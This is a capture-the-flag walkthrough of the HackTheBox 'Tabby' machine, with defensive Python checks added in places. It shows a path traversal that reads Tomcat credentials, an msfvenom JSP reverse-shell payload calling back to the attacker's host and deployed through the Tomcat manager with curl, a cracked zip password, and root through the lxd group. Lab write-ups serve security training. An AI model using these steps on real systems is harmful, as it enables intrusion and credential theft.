Tabby Walkthrough
Hey folks, here we are back again to continue the HackTheBox machines series with the "Tabby" machine. Before we get started, let's take a look at the machine's info.


As you can see, it's rated easy, but in my opinion it should be medium because every step has something new and it seems hard for beginners. Let's get started…
We will work on it without Metasploit.
As usual, we will begin our walkthrough with an nmap scan to get all open ports and the services running on them. Let's perform a standard scan:
nmap -A -T4 10.10.10.194
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
We have ports 22/80/8080 open, with the services apache 2.4.41 / openssh 8.2p1 / apache tomcat, so what will we do?
Try to search for exploits in apache 2.4.41 by using the searchsploit tool
Try to brute-force ssh credentials by using nmap scripts and the brutespray tool
Try to brute-force tomcat credentials by using metasploit and nmap scripts
Try to enumerate the websites at 10.10.10.194:80 and 10.10.10.194:8080 and do content discovery by using dirbuster/dirsearch/ffuf/gobuster
Let's start…
Enumeration
We will try to enumerate the services to get the misconfigurations and vulnerabilities.
Public exploitation
I've searched exploit-db, rapid-7 and other public websites for public exploits for apache 2.4.41 / openssh 8.2p1, but unfortunately we found nothing.
For Tomcat we found exploits at rapid-7 and exploit-db, but we must know the tomcat credentials and the manager path, so we will need them later, not now.
SSH Credentials
I've brute-forced ssh credentials by using nmap and brutespray, but found nothing useful!!
Tomcat login credentials brute force
I've brute-forced the credentials, but again nothing useful. We used metasploit.
Check the method at Metasploit
Website Enumeration and content discovery
At first I will open 10.10.10.194:80

Nice, we have a website that looks like many real-life websites, and it seems to be a hosting website, so let's explore it and check its source code.
While checking the source code we found this link: megahosting.htb/news.php?file=statement, so we need to add the megahosting domain to the /etc/hosts file by adding a line like this:
10.10.10.194 megahosting
and then we will access the link above.

Let's search Google for a megahosting exploit; it may be affected by a custom exploit.
We have found this one

Exploitation
Until now we don't know our version, so let's try this exploit against the link above, megahosting.htb/news.php?file=statement

Good, it's vulnerable too.
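For the defending side, here is an added example (not part of the original walkthrough) that scans Apache access-log lines for traversal attempts in the file parameter of news.php, including percent-encoded and double-encoded forms. The log lines, client addresses and timestamps are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (combined log format), for illustration only.
SAMPLE_LOG = [
    '10.10.14.7 - - [01/Jul/2020:10:00:01 +0000] "GET /news.php?file=statement HTTP/1.1" 200 1574 "-" "Mozilla/5.0"',
    '10.10.14.7 - - [01/Jul/2020:10:00:09 +0000] "GET /news.php?file=../../../../etc/passwd HTTP/1.1" 200 1850 "-" "curl/7.68.0"',
    '10.10.14.7 - - [01/Jul/2020:10:00:15 +0000] "GET /news.php?file=..%2f..%2f..%2fetc%2fhostname HTTP/1.1" 200 12 "-" "curl/7.68.0"',
    '10.10.14.7 - - [01/Jul/2020:10:00:21 +0000] "GET /news.php?file=%252e%252e%252fconfig HTTP/1.1" 200 0 "-" "curl/7.68.0"',
    '10.10.14.9 - - [01/Jul/2020:10:01:00 +0000] "GET /assets/css/main.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

# client, method, request target, status code
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True for parent-directory segments, absolute paths or NUL bytes."""
    v = fully_decode(value).replace("\\", "/")
    return ".." in v.split("/") or v.startswith("/") or "\x00" in v

def find_traversal(lines, param="file"):
    """Return (client, decoded value, status) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        query = urlsplit(target).query
        # keep_blank_values so an empty "file=" is still inspected
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            if is_traversal(value):
                hits.append((client, fully_decode(value), int(status)))
    return hits
```

A hit that was answered with status 200 and a non-trivial body size is the one to triage first, since it suggests the file was actually returned.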
Let's try to get information from the tomcat directories; they may hold sensitive information.
After some enumeration, I've found a bunch of directories in these links.
I also searched for the location of the tomcat-users.xml file and found it in them, so let's try to open all of them by using burp intruder or anything else.

/var/share/tomcat9/etc/tomcat-users.xml is available and has credentials for the admin-gui and manager-script roles, so let's take these credentials and try to upload a reverse payload.
Note: one of the privileges of admin-gui and manager-script is to deploy files on the server, so we will create a reverse payload and then deploy it.
reverse shell payload:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.war
deploy your payload:
curl --upload-file <path/to/shell.war> "http://megahosting:8080/manager/deploy/text?path=/shell&update=true"
and then you can access it by opening nc <port-number> and accessing the webpage megahosting:8080/shell
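The step above works because tomcat-users.xml holds an account with deploy-capable roles and the file could be read through the web application. As an added example (not from the original walkthrough), this audit parses a tomcat-users.xml document and reports accounts holding manager or admin roles, plus a world-readable file mode. The XML, user names and passwords are constructed placeholders; the file_mode argument is an assumption standing in for os.stat(path).st_mode.

```python
import stat
import xml.etree.ElementTree as ET

# Roles that allow managing or deploying applications through Tomcat's
# manager and host-manager web applications.
SENSITIVE_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                   "admin-gui", "admin-script"}

# Constructed tomcat-users.xml; user names and passwords are placeholders.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="EXAMPLE_USER" password="EXAMPLE_PASSWORD" roles="admin-gui,manager-script"/>
  <user username="monitor" password="EXAMPLE_PASSWORD_2" roles="manager-status"/>
</tomcat-users>
"""

def local(tag):
    """Strip the XML namespace so the check works with or without xmlns."""
    return tag.rsplit("}", 1)[-1]

def audit_tomcat_users(xml_text, file_mode=None):
    """Return (kind, subject, detail) findings for a tomcat-users.xml document."""
    findings = []
    root = ET.fromstring(xml_text.encode("utf-8"))
    for el in root.iter():
        if local(el.tag) != "user":
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        risky = sorted(roles & SENSITIVE_ROLES)
        if risky:
            findings.append(("deploy-capable-user", el.get("username"), risky))
    # When the "other" read bit is set, every local account, including the
    # one the web server runs as, can read the stored credentials.
    if file_mode is not None and stat.S_IMODE(file_mode) & stat.S_IROTH:
        findings.append(("world-readable", "tomcat-users.xml",
                         oct(stat.S_IMODE(file_mode))))
    return findings
```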


So for now we're in the server but not as the user, so let's discover our privileges by opening the users' directories

We can't open the user directory, so let's try to get more privileges by searching for any important directories or files
After some enumeration, I found this backup file in /var/www/html/files

So I will try to download it to the local machine and look at its content.
We will transfer it by opening a server on the vulnerable machine and accessing it from the attack machine:
Vulnerable machine > python3 -m http.server 80
Attack machine > wget http://10.10.10.194:80/backup-file-name
Now we have it on our attack machine, let's try to unzip it with unzip file-name

It's protected by a password, so you can use hashcat or John the Ripper to crack the password. I'll use fcrackzip because it doesn't take much time

And we have the password admin@it
After unzipping the file I found nothing useful inside it, so let's use the password in another way.
Let's try to use it to log in as the ash user: run su ash and enter this password

Good, we have more privileges now but not the user privileges, so let's grab the user.txt first

Good, for now let's try to find anything that leads us to root access.
If you noticed, the ash user is in the lxd group
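Membership of the lxd group is what an administrator should look for here. The audit below is an added example, not from the original walkthrough; it lists non-root accounts in root-equivalent groups, including accounts that belong only through their primary GID in /etc/passwd and so do not appear in the /etc/group member list. It goes slightly beyond the page by also checking the docker group. The file excerpts, UIDs, GIDs and the builder account are constructed.

```python
# Groups whose members can effectively obtain root on the host.
RISKY_GROUPS = {"lxd", "docker"}

# Constructed /etc/group and /etc/passwd excerpts, for illustration only.
SAMPLE_GROUP = """root:x:0:
adm:x:4:syslog
lxd:x:116:ash
docker:x:998:
"""
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
ash:x:1000:1000::/home/ash:/bin/bash
builder:x:1001:116::/home/builder:/bin/bash
tomcat:x:997:997::/opt/tomcat:/bin/false
"""

def root_equivalent_members(group_text, passwd_text, groups=RISKY_GROUPS):
    """Map each risky group to its sorted non-root members."""
    gids, members = {}, {}
    for line in group_text.splitlines():
        parts = line.strip().split(":")
        if len(parts) == 4 and parts[0] in groups:
            gids[parts[2]] = parts[0]
            members[parts[0]] = {u for u in parts[3].split(",") if u}
    for line in passwd_text.splitlines():
        parts = line.strip().split(":")
        # Primary-group membership is recorded only in /etc/passwd (field 4).
        if len(parts) == 7 and parts[3] in gids:
            members[gids[parts[3]]].add(parts[0])
    return {g: sorted(m - {"root"}) for g, m in members.items() if m - {"root"}}
```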

So after some Google searching about how to use this role to become the root user, I've found an awesome resource for doing it.
Before we follow this resource, let's first get an interactive shell, because it will not work in the normal shell:
python -c 'import pty; pty.spawn("/bin/bash")'
It will give you an interactive shell so that you can access lxd; then do exactly as this man does.
As you will find in the link above, I've downloaded the tar file and transferred it to the vulnerable machine, as you can see

After that, I compiled it on the victim machine and created an image

The final step is to access the image which we created


Let's get our root.txt from the root directory

There's nothing in this directory

It seems that he's kidding me :)
Let's search for the flag in all directories
After some searching, I've found ❤
